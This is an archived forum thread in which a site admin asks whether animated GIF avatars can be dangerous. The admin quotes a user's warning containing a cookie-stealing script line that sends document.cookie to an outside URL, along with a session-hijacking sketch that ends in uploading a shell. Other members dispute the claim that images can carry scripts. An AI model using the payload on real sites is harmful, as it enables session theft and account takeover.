Simple Machines Community Forum

Archived Boards and Threads... => Archived Boards => Install and Upgrade Help => Topic started by: jbryant on January 17, 2007, 05:41:23 AM

Title: animated gifs dangerous?
Post by: jbryant on January 17, 2007, 05:41:23 AM
Is it true that allowing animated gifs in the signature or avatar is dangerous?

This was posted on my forum by one of my more experienced foreign users:


<"script>window.location('http://www.mysite/cookie.php?c=' + document.cookie)</script">

this is something that could be emplemented into a gif pic or as swf flash animated thing ... this will steal the cookie of people who visit the page that the pic is in ...

if you dont know what a cookie is ... or how it is used to hack accounts ... try this


login to the forum
after you login
in the address bar (url bar) whipe every thing and write
javascript:alert(document.cookie)

you will get a pop up window with stuff in it ...
one is SMF*** or something ...
if i got that for any user
i can use inline javascript to change my user to the user i got his cookie ...
that means his personal stuff will no longer be personal ... and if as admin visited the page with the gif or the swf ...

admin rights ... upload a shell ... all the site will go down .. and even the hosting company server that hosts the site ...

thats if the hacker was a samrt one and wannet to do that

why do you think that scripts are not allowed in forums and stuff like that?

cause its soooooooooo much danger.



How do I disable the gif in the signature if this is true?
Thank you in advance.
Title: Re: animated gifs dangerous?
Post by: Dannii on January 17, 2007, 05:56:01 AM
Animated gifs aren't any more dangerous than any other type of image, and I'm pretty sure that the risk is extremely low. You can't embed a script in an image like that.
Title: Re: animated gifs dangerous?
Post by: Daniel15 on January 17, 2007, 07:44:04 AM
You can not embed a script in an image! An image is just that: An image. It can't contain anything else.

As far as I know, Flash itself can not read your cookies, it needs a seperate JavaScript to do so (I could be wrong, though)

Quoteadmin rights ... upload a shell ... all the site will go down .. and even the hosting company server that hosts the site ...

thats if the hacker was a samrt one and wannet to do that
Sounds like a script kiddie to me :-\
Title: Re: animated gifs dangerous?
Post by: webvision on January 17, 2007, 08:48:51 AM
I think animated or simples images both are equal.